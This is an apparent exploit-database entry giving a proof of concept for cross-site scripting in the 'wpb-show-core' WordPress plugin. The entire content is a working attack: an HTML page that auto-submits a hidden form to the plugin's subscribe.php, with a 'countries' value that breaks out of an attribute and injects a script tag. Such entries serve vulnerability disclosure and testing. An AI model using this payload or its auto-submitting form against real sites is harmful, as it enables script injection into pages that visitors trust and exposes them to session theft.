Share
## https://sploitus.com/exploit?id=WPEX-ID:D7034AC2-0098-48D2-9BA9-87E09B178F7D
Open an HTML file containing the following:

```
<html>
  <body>
    <form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
      <input type="hidden" name="firstname" value="test" />
      <input type="hidden" name="lastname" value="test2" />    
      <input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
```